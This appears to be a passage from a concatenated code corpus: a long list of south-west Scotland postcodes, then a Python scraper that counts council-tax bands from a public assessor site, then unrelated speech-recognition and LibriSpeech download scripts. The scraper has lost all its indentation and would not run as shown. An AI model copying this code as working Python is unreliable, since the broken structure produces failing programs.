DG8 9LH
DG8 9LJ
DG8 9LL
DG8 9LN
DG8 9LP
DG8 9LQ
DG8 9LR
DG8 9LS
DG8 9LT
DG8 9LU
DG8 9LW
DG8 9LX
DG8 9LY
DG8 9LZ
DG8 9NA
DG8 9NB
DG8 9ND
DG8 9NE
DG8 9NF
DG8 9NG
DG8 9NN
DG8 9NP
DG8 9NR
DG8 9NS
DG8 9NT
DG8 9NU
DG8 9NX
DG8 9NY
DG8 9NZ
DG8 9PA
DG8 9PB
DG8 9PD
DG8 9PE
DG8 9PF
DG8 9PG
DG8 9PH
DG8 9PJ
DG8 9PL
DG8 9PN
DG8 9PP
DG8 9PQ
DG8 9PR
DG8 9PS
DG8 9PT
DG8 9PU
DG8 9PW
DG8 9PX
DG8 9PY
DG8 9QA
DG8 9QB
DG8 9QE
DG8 9QH
DG8 9QJ
DG8 9QL
DG8 9QN
DG8 9QP
DG8 9QR
DG8 9QS
DG8 9QT
DG8 9QU
DG8 9QX
DG8 9QY
DG8 9QZ
DG8 9RA
DG8 9RB
DG8 9RD
DG8 9RE
DG8 9RF
DG8 9RG
DG8 9RH
DG8 9RJ
DG8 9RL
DG8 9RN
DG8 9RP
DG8 9RQ
DG8 9RR
DG8 9RS
DG8 9RT
DG8 9RU
DG8 9SA
DG8 9SB
DG8 9SD
DG8 9SE
DG8 9SG
DG8 9SH
DG8 9SJ
DG8 9SL
DG8 9SN
DG8 9SP
DG8 9SQ
DG8 9SR
DG8 9SW
DG8 9TA
DG8 9TB
DG8 9TD
DG8 9TE
DG8 9TF
DG8 9TG
DG8 9TH
DG8 9TJ
DG8 9TL
DG8 9TQ
DG9 0AA
DG9 0AB
DG9 0AD
DG9 0AE
DG9 0AF
DG9 0AG
DG9 0AH
DG9 0AJ
DG9 0AL
DG9 0AN
DG9 0AP
DG9 0AQ
DG9 0AR
DG9 0AS
DG9 0AT
DG9 0AU
DG9 0AW
DG9 0AX
DG9 0AY
DG9 0AZ
DG9 0BA
DG9 0BB
DG9 0BD
DG9 0BE
DG9 0BG
DG9 0BH
DG9 0BJ
DG9 0BL
DG9 0BN
DG9 0BP
DG9 0BQ
DG9 0BS
DG9 0BT
DG9 0BU
DG9 0BW
DG9 0BX
DG9 0BY
DG9 0BZ
DG9 0DA
DG9 0DB
DG9 0DD
DG9 0DE
DG9 0DF
DG9 0DG
DG9 0DH
DG9 0DJ
DG9 0DL
DG9 0DN
DG9 0DQ
DG9 0DS
DG9 0DT
DG9 0DU
DG9 0DX
DG9 0DY
DG9 0DZ
DG9 0EA
DG9 0EB
DG9 0ED
DG9 0EE
DG9 0EF
DG9 0EG
DG9 0EH
DG9 0EJ
DG9 0EL
DG9 0EN
DG9 0EP
DG9 0EQ
DG9 0ER
DG9 0ES
DG9 0ET
DG9 0EU
DG9 0EW
DG9 0EX
DG9 0EY
DG9 0EZ
DG9 0HA
DG9 0HB
DG9 0HD
DG9 0HE
DG9 0HF
DG9 0HG
DG9 0HH
DG9 0HL
DG9 0HQ
DG9 0HS
DG9 0HW
DG9 0HX
DG9 0HY
DG9 0HZ
DG9 0JA
DG9 0JB
DG9 0JD
DG9 0JE
DG9 0JF
DG9 0JH
DG9 0JJ
DG9 0JL
DG9 0JN
DG9 0JP
DG9 0JQ
DG9 0JT
DG9 0JZ
DG9 0LA
DG9 0LB
DG9 0LD
DG9 0LE
DG9 0LF
DG9 0LG
DG9 0LH
DG9 0LJ
DG9 0LL
DG9 0LN
DG9 0LP
DG9 0LQ
DG9 0LR
DG9 0LS
DG9 0LT
DG9 0LU
DG9 0LW
DG9 0LX
DG9 0LY
DG9 0LZ
DG9 0NA
DG9 0NB
DG9 0ND
DG9 0NE
DG9 0NL
DG9 0NN
DG9 0NP
DG9 0NS
DG9 0NT
DG9 0NU
DG9 0NW
DG9 0NX
DG9 0NY
DG9 0NZ
DG9 0PA
DG9 0PB
DG9 0PD
DG9 0PE
DG9 0PL
DG9 0PN
DG9 0PP
DG9 0PR
DG9 0PS
DG9 0PT
DG9 0PU
DG9 0PW
DG9 0PX
DG9 0PY
DG9 0PZ
DG9 0QA
DG9 0QB
DG9 0QD
DG9 0QE
DG9 0QF
DG9 0QG
DG9 0QP
DG9 0QQ
DG9 0QR
DG9 0QS
DG9 0QT
DG9 0QU
DG9 0QX
DG9 0QY
DG9 0QZ
DG9 0RA
DG9 0RB
DG9 0RD
DG9 0RE
DG9 0RF
DG9 0RG
DG9 0RH
DG9 0RJ
DG9 0RL
DG9 0RN
DG9 0RP
DG9 0RQ
DG9 0RR
DG9 0RS
DG9 0RT
DG9 0RU
DG9 0RW
DG9 0RX
DG9 0RY
DG9 1AB
DG9 7AA
DG9 7AB
DG9 7AD
DG9 7AE
DG9 7AF
DG9 7AG
DG9 7AH
DG9 7AJ
DG9 7AL
DG9 7AN
DG9 7AP
DG9 7AQ
DG9 7AR
DG9 7AS
DG9 7AT
DG9 7AU
DG9 7AW
DG9 7AX
DG9 7AY
DG9 7AZ
DG9 7BA
DG9 7BB
DG9 7BD
DG9 7BE
DG9 7BG
DG9 7BH
DG9 7BJ
DG9 7BL
DG9 7BN
DG9 7BP
DG9 7BQ
DG9 7BS
DG9 7BT
DG9 7BU
DG9 7BW
DG9 7BX
DG9 7BY
DG9 7BZ
DG9 7DA
DG9 7DB
DG9 7DD
DG9 7DE
DG9 7DF
DG9 7DH
DG9 7DL
DG9 7DN
DG9 7DQ
DG9 7DR
DG9 7DS
DG9 7DU
DG9 7DW
DG9 7DX
DG9 7DZ
DG9 7EA
DG9 7EB
DG9 7ED
DG9 7EE
DG9 7EF
DG9 7EG
DG9 7EH
DG9 7EJ
DG9 7EL
DG9 7EN
DG9 7EP
DG9 7ER
DG9 7ES
DG9 7ET
DG9 7EU
DG9 7EW
DG9 7EX
DG9 7EY
DG9 7EZ
DG9 7FB
DG9 7FD
DG9 7FE
DG9 7FG
DG9 7FH
DG9 7FJ
DG9 7GA
DG9 7HA
DG9 7HB
DG9 7HD
DG9 7HE
DG9 7HF
DG9 7HH
DG9 7HJ
DG9 7HL
DG9 7HN
DG9 7HP
DG9 7HR
DG9 7HS
DG9 7HT
DG9 7HU
DG9 7HW
DG9 7HX
DG9 7HY
DG9 7JA
DG9 7JB
DG9 7JE
DG9 7JF
DG9 7JG
DG9 7JH
DG9 7JJ
DG9 7JL
DG9 7JN
DG9 7JP
DG9 7JS
DG9 7JU
DG9 7JW
DG9 7JY
DG9 7JZ
DG9 7LA
DG9 7LB
DG9 7LD
DG9 7LF
DG9 7LG
DG9 7LH
DG9 7LJ
DG9 7LL
DG9 7LN
DG9 7LP
DG9 7LQ
DG9 7LR
DG9 7LS
DG9 7LT
DG9 7LU
DG9 7LW
DG9 7LX
DG9 7LY
DG9 7LZ
DG9 7NA
DG9 7NB
DG9 7ND
DG9 7NE
DG9 7NF
DG9 7NG
DG9 7NH
DG9 7NL
DG9 7NN
DG9 7NP
DG9 7NQ
DG9 7NS
DG9 7NU
DG9 7NW
DG9 7NX
DG9 7NY
DG9 7NZ
DG9 7PA
DG9 7PB
DG9 7PD
DG9 7PG
DG9 7PH
DG9 7PJ
DG9 7PQ
DG9 7PT
DG9 7PU
DG9 7PW
DG9 7PX
DG9 7PY
DG9 7PZ
DG9 7QA
DG9 7QB
DG9 7QD
DG9 7QE
DG9 7QF
DG9 7QG
DG9 7QH
DG9 7QJ
DG9 7QL
DG9 7QN
DG9 7QP
DG9 7QQ
DG9 7QR
DG9 7QS
DG9 7QT
DG9 7QU
DG9 7QW
DG9 7QX
DG9 7QY
DG9 7QZ
DG9 8TQ
DG9 8TR
DG9 8TS
DG9 8TT
DG9 8TW
DG9 8TX
DG9 8TY
DG9 8TZ
DG9 8UA
DG9 8UB
DG9 8WX
DG9 9AA
DG9 9AB
DG9 9AD
DG9 9AE
DG9 9AF
DG9 9AG
DG9 9AH
DG9 9AJ
DG9 9AL
DG9 9AN
DG9 9AP
DG9 9AQ
DG9 9AR
DG9 9AS
DG9 9AT
DG9 9AU
DG9 9AW
DG9 9AX
DG9 9AZ
DG9 9BA
DG9 9BB
DG9 9BD
DG9 9BE
DG9 9BG
DG9 9BH
DG9 9BJ
DG9 9BL
DG9 9BN
DG9 9BP
DG9 9BQ
DG9 9BS
DG9 9BT
DG9 9BU
DG9 9BW
DG9 9BX
DG9 9BY
DG9 9BZ
DG9 9DB
DG9 9DE
DG9 9DF
DG9 9DG
DG9 9DH
DG9 9DJ
DG9 9DL
DG9 9DN
DG9 9DP
DG9 9DQ
DG9 9DR
DG9 9DU
DG9 9DW
DG9 9DX
DG9 9DY
DG9 9DZ
DG9 9EA
DG9 9EB
DG9 9ED
DG9 9EE
DG9 9EF
DG9 9EG
DG9 9EH
DG9 9EN
DG9 9EQ
DG9 9ES
DG9 9ET
DG9 9EU
DG9 9EX
DG9 9HA
DG9 9HB
DG9 9HD
DG9 9HE
DG9 9HF
DG9 9HG
DG9 9HH
DG9 9HJ
DG9 9HL
DG9 9HN
DG9 9HP
DG9 9HQ
DG9 9HR
DG9 9HS
DG9 9HW
DG9 9JA
DG9 9JB
DG9 9JD
DG9 9JE
DG9 9JF
DG9 9JG
DG9 9JH
DG9 9JJ
DG9 9JL
DG9 9JN
DG9 9JP
DG9 9JQ
DG9 9JR
DG9 9JS
DG9 9JT
DG9 9JU
DG9 9JW
DG9 9JX
DG9 9JY
DG9 9JZ
DG9 9LA
DG9 9LB
DG9 9LD
DG9 9LE
DG9 9LF
DG9 9LG
DG9 9LH
DG9 9LJ
DG9 9LL
DG9 9LQ
DG9 9LS
DG9 9LT
DG9 9LU
DG9 9LX
DG9 7RA
DG9 7RB
DG9 7RD
DG9 7RE
DG9 7RF
DG9 7RH
DG9 7RJ
DG9 7RL
DG9 7RN
DG9 7RP
DG9 7RQ
DG9 7RR
DG9 7RS
DG9 7RT
DG9 7RW
DG9 7RX
DG9 7RY
DG9 7RZ
DG9 7SA
DG9 7SB
DG9 7SD
DG9 7SE
DG9 7SF
DG9 7SG
DG9 7SJ
DG9 7SL
DG9 7SN
DG9 7SP
DG9 7SQ
DG9 7SR
DG9 7SS
DG9 7ST
DG9 7SU
DG9 7SW
DG9 7SX
DG9 7SY
DG9 7SZ
DG9 7TA
DG9 7TB
DG9 7TE
DG9 7TF
DG9 7TG
DG9 7TH
DG9 7TJ
DG9 7TL
DG9 7TN
DG9 7TP
DG9 7TQ
DG9 7TR
DG9 7TS
DG9 7TT
DG9 7TU
DG9 7TW
DG9 7TY
DG9 7UD
DG9 7UE
DG9 7UF
DG9 8AA
DG9 8AB
DG9 8AD
DG9 8AE
DG9 8AF
DG9 8AG
DG9 8AH
DG9 8AJ
DG9 8AN
DG9 8AP
DG9 8AQ
DG9 8AR
DG9 8AS
DG9 8AT
DG9 8AU
DG9 8AW
DG9 8AX
DG9 8AY
DG9 8AZ
DG9 8BA
DG9 8BB
DG9 8BD
DG9 8BE
DG9 8BF
DG9 8BG
DG9 8BH
DG9 8BJ
DG9 8BL
DG9 8BN
DG9 8BP
DG9 8BQ
DG9 8BS
DG9 8BT
DG9 8BU
DG9 8BW
DG9 8BX
DG9 8BY
DG9 8BZ
DG9 8DA
DG9 8DB
DG9 8DD
DG9 8DE
DG9 8DF
DG9 8DG
DG9 8DH
DG9 8DJ
DG9 8DL
DG9 8DP
DG9 8DQ
DG9 8DR
DG9 8DS
DG9 8DT
DG9 8DU
DG9 8DX
DG9 8DY
DG9 8ED
DG9 8EE
DG9 8EG
DG9 8EH
DG9 8EJ
DG9 8EP
DG9 8ER
DG9 8ES
DG9 8ET
DG9 8EU
DG9 8EX
DG9 8EY
DG9 8EZ
DG9 8HA
DG9 8HB
DG9 8HG
DG9 8HH
DG9 8HJ
DG9 8HL
DG9 8HN
DG9 8HP
DG9 8HQ
DG9 8HT
DG9 8HU
DG9 8HW
DG9 8HX
DG9 8HY
DG9 8HZ
DG9 8JA
DG9 8JB
DG9 8JD
DG9 8JE
DG9 8JG
DG9 8LA
DG9 8LB
DG9 8LD
DG9 8LE
DG9 8LF
DG9 8LG
DG9 8LH
DG9 8LJ
DG9 8LN
DG9 8LP
DG9 8LQ
DG9 8LR
DG9 8LX
DG9 8LY
DG9 8LZ
DG9 8NA
DG9 8NB
DG9 8ND
DG9 8NE
DG9 8NJ
DG9 8NL
DG9 8NN
DG9 8NP
DG9 8NR
DG9 8NU
DG9 8NW
DG9 8NX
DG9 8NY
DG9 8NZ
DG9 8PA
DG9 8PB
DG9 8PD
DG9 8PF
DG9 8PG
DG9 8PH
DG9 8PJ
DG9 8PL
DG9 8PP
DG9 8PQ
DG9 8PR
DG9 8PS
DG9 8PT
DG9 8PW
DG9 8PX
DG9 8PY
DG9 8PZ
DG9 8QA
DG9 8QB
DG9 8QH
DG9 8SA
DG9 8SB
DG9 8SD
DG9 8SE
DG9 8SF
DG9 8SG
DG9 8SH
DG9 8SJ
DG9 8SL
DG9 8SN
DG9 8SP
DG9 8SQ
DG9 8SR
DG9 8SU
DG9 8SW
DG9 8SX
DG9 8SY
DG9 8SZ
DG9 8TA
DG9 8TB
DG9 8TD
DG9 8TE
DG9 8TF
DG9 8TH
DG9 8TJ
DG9 8TL
DG9 8TN
DG9 8TP
DG9 9LY
DG9 9LZ
DG9 9NA
DG9 9NB
DG9 9ND
DG9 9NE
DG9 9NF
DG9 9NG
DG9 9NH
DG9 9NJ
DG9 9NL
DG9 9NN
DG9 9NP
DG9 9NQ
DG9 9NR
DG9 9NS
DG9 9NT
DG9 9NU
DG9 9NW
DG9 9NX
DG9 9NY
DG9 9NZ
DG9 9PA
DG9 9PB
DG9 9PD
DG9 9PE
DG9 9PF
DG9 9PG
DG9 9PH
DG9 9PJ
DG9 9PQ
DG9 9PS
DG9 9PT
DG9 9PU
DG9 9PX
DG9 9PY
DG9 9PZ
DG9 9QA
DG9 9QD
DG9 9QE
DG9 9QF
DG9 9QG
DG9 9QL
DG9 9QN
DG9 9QP
DG9 9QQ
DG9 9QR
DG9 9QS
DG9 9QT
DG9 9QU
DG9 9QW
DG9 9QX
DG9 9QY
DG9 9QZ
DG9 9RB
DG9 9RD
DG9 9WT
DG9 9WW
ML12 6FR
ML12 6UH
ML12 6UJ
ML12 6UN
ML12 6UP
ML12 6UR
ML12 6UT
ML12 6UU
ML12 6UW
ML12 6UX
ML12 6UY
ML12 6UZ
ML12 6WT
ML12 6XA
ML12 6XB
ML12 6XD
ML12 6XE
ML12 6XF
ML12 6XG
ML12 6XH
ML12 6XJ
ML12 6XL
ML12 6XQ
DG11 3HS
DG12 5LG
DG12 5RW
DG12 6AE
DG12 6AH
DG12 6AX
DG12 6BL
DG12 6BP
DG12 6NP
DG12 6PL
DG12 6RE
DG12 6TA
DG13 0ED
DG13 0EL
DG13 0JA
DG13 0JJ
DG13 0JU
DG13 0LA
DG13 0LX
DG13 0PH
DG14 0RG
DG2 0BS
DG2 0LH
DG2 0LN
DG2 0NA
DG2 0NT
DG2 0NX
DG2 0NY
DG2 0PX
DG2 0RN
DG2 0SQ
DG2 0UQ
DG2 7BN
DG2 7BQ
DG2 7DP
DG2 7EG
DG2 7HD
DG2 7HP
DG2 7HW
DG2 7SG
DG2 8BA
DG2 8NT
DG2 8PG
DG2 8PQ
DG2 9AJ
DG2 9AT
DG2 9BB
DG2 9BJ
DG2 9DA
DG2 9DU
DG2 9DY
DG2 9HD
DG2 9SW
DG3 4AA
DG3 4DT
DG3 4EP
DG3 4HG
DG3 4JH
DG3 4LW
DG3 5DE
DG3 5DU
DG3 5HF
DG3 5HS
DG3 5LR
DG3 5LT
DG4 6BE
DG4 6DD
DG4 6EA
DG4 6EE
DG4 6HP
CA6 5AA
CA6 5AB
CA6 5AD
CA6 5AE
CA6 5AF
CA6 5AG
CA6 5AH
CA6 5AJ
CA6 5AL
CA6 5AN
CA6 5AP
CA6 5AQ
CA6 5AR
CA6 5AS
CA6 5AT
CA6 5AU
CA6 5AW
CA6 5AX
CA6 5AY
CA6 5AZ
CA6 5BA
CA6 5BB
CA6 5BD
CA6 5BE
CA6 5BG
CA6 5BH
CA6 5BJ
CA6 5BL
CA6 5BN
CA6 5BP
CA6 5BQ
CA6 5BS
CA6 5BT
CA6 5BU
CA6 5BW
CA6 5BX
CA6 5BY
CA6 5BZ
CA6 5DA
CA6 5DB
CA6 5DD
CA6 5DE
CA6 5DF
CA6 5DG
CA6 5DH
CA6 5DJ
CA6 5DL
CA6 5DN
CA6 5DP
CA6 5DQ
CA6 5DR
CA6 5DS
CA6 5DT
CA6 5DU
CA6 5DW
CA6 5DX
CA6 5DY
CA6 5DZ
CA6 5EA
CA6 5EB
CA6 5ED
CA6 5EE
CA6 5EF
CA6 5EG
CA6 5EH
CA6 5EJ
CA6 5EL
CA6 5EN
CA6 5EP
CA6 5EQ
CA6 5ER
CA6 5ES
CA6 5ET
CA6 5EU
CA6 5EW
CA6 5EX
CA6 5EY
CA6 5EZ
CA6 5HA
CA6 5HB
CA6 5HD
CA6 5HE
CA6 5HF
CA6 5HG
CA6 5HH
CA6 5HJ
CA6 5HL
CA6 5HN
CA6 5HP
CA6 5HQ
CA6 5HR
CA6 5HS
CA6 5HW
CA6 5HX
CA6 5HY
CA6 5HZ
CA6 5JD
CA6 5JE
CA6 5JF
CA6 5JG
CA6 5JH
CA6 5JJ
CA6 5JL
CA6 5JN
CA6 5JP
CA6 5JQ
CA6 5JR
CA6 5JS
CA6 5JT
CA6 5JU
CA6 5JW
CA6 5JX
CA6 5JZ
CA6 5LA
CA6 5LB
CA6 5LD
CA6 5LE
DG1 1AD
DG1 1AE
DG1 1AU
DG1 1BB
DG1 1BN
DG1 1BQ
DG1 1DH
DG1 1DN
DG1 1DP
DG1 1DQ
DG1 1LY
DG1 1NB
DG1 1ND
DG1 1NU
DG1 1NX
DG1 1PH
DG1 1PQ
DG1 1PY
DG1 1QT
DG1 1SB
DG1 1SN
DG1 1TJ
DG1 2AF
DG1 2AQ
DG1 2AS
DG1 2AU
DG1 2AY
DG1 2BB
DG1 2BL
DG1 2BP
DG1 2BW
DG1 2BX
DG1 2BZ
DG1 2DH
DG1 2DW
DG1 2EA
DG1 2EG
DG1 2ES
DG1 2HW
DG1 2LD
DG1 1DS
DG1 1DY
DG1 1DZ
DG1 1EE
DG1 1EN
DG1 1EQ
DG1 1ER
DG1 1ES
DG1 1EY
DG1 1EZ
DG1 1HQ
DG1 1HT
DG1 1JS
DG1 1LA
DG1 1LL
DG1 1LQ
DG1 1XX
DG1 2LW
DG1 2NW
DG1 2NY
DG1 2PT
DG1 2PU
DG1 2QA
DG1 2QJ
DG1 2QU
DG1 2QY
DG1 2QZ
DG1 2RD
DG1 2RG
DG1 2RJ
DG1 2SB
DG1 3AA
DG1 3AF
DG1 3BG
DG1 3BS
DG1 3DH
DG1 3EH
DG1 3EL
DG1 3ER
DG1 3HD
DG1 3JT
DG1 3PZ
DG1 3QQ
DG1 3TX
DG1 4EL
DG1 4JD
DG1 4SZ
DG1 4US
DG1 4WQ
DG1 4ZA
DG1 4ZB
DG1 4ZG
DG1 4ZH
DG1 4ZY
DG10 9AF
DG10 9AU
DG10 9DZ
DG10 9EN
DG10 9EQ
DG10 9EW
DG10 9GZ
DG10 9NQ
DG10 9QD
DG10 9QY
DG11 1EE
DG11 1SD
DG11 2BN
DG11 2BW
DG11 2DD
DG11 2HD
DG11 2HS
DG11 2JN
DG11 2JW
DG11 2LT
DG4 6JR
DG4 6LH
DG4 6LT
DG4 6NF
DG4 6NG
DG4 6NH
DG4 6PJ
DG4 6PP
DG4 6PS
DG4 6PT
DG4 6PX
DG4 6QD
DG4 6QE
DG4 6QF
DG4 6QG
DG4 6RU
DG4 6RW
DG4 6SQ
DG4 6YT
DG5 4BD
DG5 4JQ
DG5 4NG
DG5 4UL
DG6 4AB
DG6 4AY
DG6 4DG
DG6 4EE
DG6 4ET
DG6 4LN
DG6 4PL
DG6 4QX
DG6 4RY
DG6 4UF
DG6 4UQ
DG7 1AS
DG7 1AW
DG7 1DF
DG7 1DP
DG7 1DY
DG7 1HT
DG7 1HW
DG7 1JR
DG7 1JW
DG7 1PJ
DG7 1PZ
DG7 2HN
DG7 2NH
DG7 3JP
DG7 3JR
DG7 3JS
DG8 0AR
DG8 0BP
DG8 0ES
DG8 0EW
DG8 0LQ
DG8 0PG
DG8 0QS
DG8 6BU
DG8 6BY
DG8 6DP
DG8 6ED
DG8 6HS
DG8 6JP
DG8 6JU
DG8 6NJ
DG8 6NN
DG8 6RF
DG8 6RG
DG8 6SQ
DG8 6ST
DG8 7AP
DG8 7AY
DG8 7DD
DG8 7DJ
DG8 7JD
DG8 8LW
DG8 8NX
DG8 8PA
DG8 8PR
DG8 8QD
DG8 9AE
DG8 9AJ
DG8 9DG
DG8 9LF
DG8 9NQ
DG8 9PZ
DG8 9RW
DG8 9SF
DG9 0HN
DG9 0JG
DG9 0JW
DG9 0RZ
DG9 7DG
DG9 7DJ
DG9 7DP
DG9 7DT
DG9 7DY
DG9 7EQ
DG9 7HG
DG9 7HQ
DG9 7HZ
DG9 7JD
DG9 7JR
DG9 7JT
DG9 7JX
DG9 7LE
DG9 7NJ
DG9 7NR
DG9 7NT
DG9 7PE
DG9 7PF
DG9 7PL
DG9 7PN
DG9 7PP
DG9 7PR
DG9 7PS
DG9 7RG
DG9 7RU
DG9 7SH
DG9 7UA
DG9 7UB
DG9 8EF
DG9 8EL
DG9 8EN
DG9 8EQ
DG9 8JF
DG9 8LL
DG9 8NH
DG9 8PE
DG9 8PN
DG9 8PU
DG9 8RW
DG9 8RZ
DG9 8TG
DG9 8TU
DG9 9DS
DG9 9DT
DG9 9RA
ML12 6XN
DG1 3FJ
DG1 3FR
DG1 3FU
DG1 3GF
DG1 3GJ
DG1 3GW
DG1 9DW
DG11 1UF
DG12 6GX
DG2 9RG
DG3 5JB
DG3 5PE
DG3 9AA
DG5 4FE
DG5 4GX
DG6 4RE
DG6 4RF
DG6 4RG
DG6 4TB
DG7 1LP
DG7 2EL
DG7 3UJ
DG7 3UL
DG9 7TZ
DG1 3QZ
DG2 9RB"""
array = array.split('\n')
arrayPostCodes = array.copy()
arrayBands = [[0 for x in range(8)] for x in range(len(array))]
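# arrayBands keeps one row of eight counters per postcode, one counter for each council-tax band A-H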
charA = 'A'
for i in range(0, len(array)):
array[i] = array[i].replace(' ', '+')
def Connect2Web(postcode, index):
req = urllib.request.Request("http://www.saa.gov.uk/dumgal/search.php?SEARCHED=1&ST&SEARCH_TERM=" + postcode + "&ASSESSOR_ID=dumgal&SEARCH_TABLE=council_tax&x=0&y=0&DISPLAY_COUNT=100#results")
resp = urllib.request.urlopen(req)
web_pg = resp.read()
#print (web_pg)
#regex = "<td style='text-align:center;'>[A-H]</td>"
##localityRegex ="Please select one of the following "
localityPattern = re.compile(b"Please select one of the following ")
locality = re.findall(localityPattern, web_pg)
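# a "Please select one of the following" page means the postcode spans several localities;
# in that case every result link is followed and the band letters are pooled across them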
if (len(locality) != 0):
bandList = []
hrefPattern = re.compile(b'\/dumgal\/search\.php\?[^"]*')
allLinks = re.findall(hrefPattern, web_pg)
for i in range(1, len(allLinks)):
allLinks[i] = allLinks[i].decode("utf-8")
allLinks[i] = allLinks[i].replace("&amp;", "&")  # undo the HTML entity escaping in the href
req = urllib.request.Request("http://www.saa.gov.uk" + allLinks[i])
print ("http://www.saa.gov.uk" + allLinks[i])
resp = urllib.request.urlopen(req)
web_pg = resp.read()
#print (web_pg)
pattern = re.compile(b"<td style='text-align:center;'>[A-H]</td>")
m = re.findall(pattern, web_pg)
#print (m)
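# each match looks like b"<td style='text-align:center;'>C</td>"; the band letter sits six characters from the end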
for i in range (0, len(m)):
m[i] = m[i].decode("utf-8")
bandList.append(m[i][-6])
for i in range(0, 8):  # count all eight council-tax bands, A to H
arrayBands[index][i] = bandList.count(chr(ord('A') + i ) )
print (arrayBands[index])
else :
pattern = re.compile(b"<td style='text-align:center;'>[A-H]</td>")
m = re.findall(pattern, web_pg)
for i in range (0, len(m)):
m[i] = m[i].decode("utf-8")
m[i] = m[i][-6]
for i in range(0, 8):  # count all eight council-tax bands, A to H
arrayBands[index][i] = m.count(chr(ord('A') + i ) )
with open('bands.csv', 'a', newline='') as fp:
a = csv.writer(fp, delimiter=',')
a.writerow(['Postcode','A','B','C','D','E','F','G','H'])
for i in range(0, len(array)):
print (i)
Connect2Web(array[i], i)
a.writerow([arrayPostCodes[i]] + arrayBands[i])
``` |
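Once the scrape finishes, `bands.csv` holds one row per postcode with the count of properties in each council-tax band. A minimal follow-up sketch, assuming only the `bands.csv` layout written above (this aggregation step is not part of the original script):

```python
import csv
from collections import Counter

totals = Counter()
with open('bands.csv', newline='') as fp:
    for row in csv.DictReader(fp):
        if not row['A'].isdigit():
            continue  # skip any header rows repeated by earlier append-mode runs
        for band in 'ABCDEFGH':
            totals[band] += int(row[band])  # sum per-postcode counts into overall band totals

for band in 'ABCDEFGH':
    print(band, totals[band])
```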
{
"source": "2091527886/mockbirdremark",
"score": 2
} |
#### File: 2091527886/mockbirdremark/makedataset.py
```python
import argparse
import functools
from masr.masr.predict import Predictor
from masr.masr.utils.utils import add_arguments, print_arguments
parser = argparse.ArgumentParser(description=__doc__)
add_arg = functools.partial(add_arguments, argparser=parser)
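# add_arg is shorthand: each call below registers one command-line option on `parser`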
add_arg('wav_path', str, './dataset/test.wav', "Path of the audio file to transcribe")
add_arg('real_time_demo', bool, False, "Whether to run the real-time speech recognition demo")
add_arg('use_gpu', bool, True, "Whether to use the GPU for inference")
add_arg('to_an', bool, False, "Whether to convert numbers in the result to Arabic numerals")
add_arg('use_pun', bool, False, "Whether to add punctuation to the recognition result")
add_arg('nomoreoutput', bool, False, "Whether to suppress extra output")
add_arg('beam_size', int, 300, "Beam search decoding parameter: beam size, recommended range [5, 500]")
add_arg('alpha', float, 2.2, "Beam search decoding parameter: language model (LM) coefficient")
add_arg('beta', float, 4.3, "Beam search decoding parameter: word count (WC) coefficient")
add_arg('cutoff_prob', float, 0.99, "Beam search decoding parameter: pruning probability")
add_arg('cutoff_top_n', int, 40, "Beam search decoding parameter: pruning cutoff count")
add_arg('use_model', str, 'deepspeech2', "Model to use")
add_arg('vocab_path', str, 'dataset/vocabulary.txt', "Path of the dataset vocabulary file")
add_arg('pun_model_dir', str, 'models/pun_models/', "Directory of the punctuation model")
add_arg('model_path', str, 'models/deepspeech2/inference.pt', "Path of the exported inference model")
add_arg('lang_model_path', str, 'lm/zh_giga.no_cna_cmn.prune01244.klm', "Beam search decoding parameter: language model file path")
add_arg('feature_method', str, 'linear', "Audio preprocessing method", choices=['linear', 'mfcc', 'fbank'])
add_arg('decoder', str, 'ctc_beam_search', "Decoding method for the results", choices=['ctc_beam_search', 'ctc_greedy'])
add_arg('output', str, '233333333333333', "Output value",)
print ("-------------------------------------")
args = parser.parse_args()
print_arguments(args)
print ("-------------------------------------")
predictor = Predictor(model_path=args.model_path, vocab_path=args.vocab_path, use_model=args.use_model,
decoder=args.decoder, alpha=args.alpha, beta=args.beta, lang_model_path=args.lang_model_path,
beam_size=args.beam_size, cutoff_prob=args.cutoff_prob, cutoff_top_n=args.cutoff_top_n,
use_gpu=args.use_gpu, use_pun_model=args.use_pun, pun_model_dir=args.pun_model_dir,
feature_method=args.feature_method)
def get1(x):
score, text = predictor.predict(audio_path=x, to_an=args.to_an)
return text
wavpath=args.wav_path
pathtemp=""
# {
#   open ... from wav path
# }
returnback=""
for x in [wavpath]:  # wrap the single path in a list; iterating the bare string would loop over characters
    pathtemp = x
    returnback = get1(pathtemp)
#/n
```
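The script above transcribes only the single file passed as `--wav_path`, and the placeholder block marks where the dataset-building step was meant to go. A minimal sketch of that step, assuming wav files sit in one directory and reusing a `transcribe(path) -> str` callable such as the `get1` helper above (the directory and file names here are illustrative, not from the original):

```python
import os

def build_annotation(wav_dir, out_path, transcribe):
    """Write one 'audio_path<TAB>transcript' line per wav file, the list format used for training."""
    with open(out_path, 'w', encoding='utf-8') as f:
        for name in sorted(os.listdir(wav_dir)):
            if not name.endswith('.wav'):
                continue
            path = os.path.join(wav_dir, name)
            text = transcribe(path)  # e.g. get1() from the script above
            f.write(path + '\t' + text + '\n')

# usage sketch:
# build_annotation('./dataset/wavs', './dataset/annotation/custom.txt', get1)
```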
#### File: masr/download_data/librispeech.py
```python
import argparse
import io
import os
from utility import download, unpack
URL_ROOT = "https://openslr.magicdatatech.com/resources/12"
URL_TEST_CLEAN = URL_ROOT + "/test-clean.tar.gz"
URL_TEST_OTHER = URL_ROOT + "/test-other.tar.gz"
URL_DEV_CLEAN = URL_ROOT + "/dev-clean.tar.gz"
URL_DEV_OTHER = URL_ROOT + "/dev-other.tar.gz"
URL_TRAIN_CLEAN_100 = URL_ROOT + "/train-clean-100.tar.gz"
URL_TRAIN_CLEAN_360 = URL_ROOT + "/train-clean-360.tar.gz"
URL_TRAIN_OTHER_500 = URL_ROOT + "/train-other-500.tar.gz"
MD5_TEST_CLEAN = "32fa31d27d2e1cad72775fee3f4849a9"
MD5_TEST_OTHER = "fb5a50374b501bb3bac4815ee91d3135"
MD5_DEV_CLEAN = "42e2234ba48799c1f50f24a7926300a1"
MD5_DEV_OTHER = "c8d0bcc9cca99d4f8b62fcc847357931"
MD5_TRAIN_CLEAN_100 = "2a93770f6d5c6c964bc36631d331a522"
MD5_TRAIN_CLEAN_360 = "c0e676e450a7ff2f54aeade5171606fa"
MD5_TRAIN_OTHER_500 = "d1a0fd59409feb2c614ce4d30c387708"
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument("--target_dir",
default="../dataset/audio/",
type=str,
help="存放音频文件的目录 (默认: %(default)s)")
parser.add_argument("--annotation_text",
default="../dataset/annotation/",
type=str,
help="存放音频标注文件的目录 (默认: %(default)s)")
args = parser.parse_args()
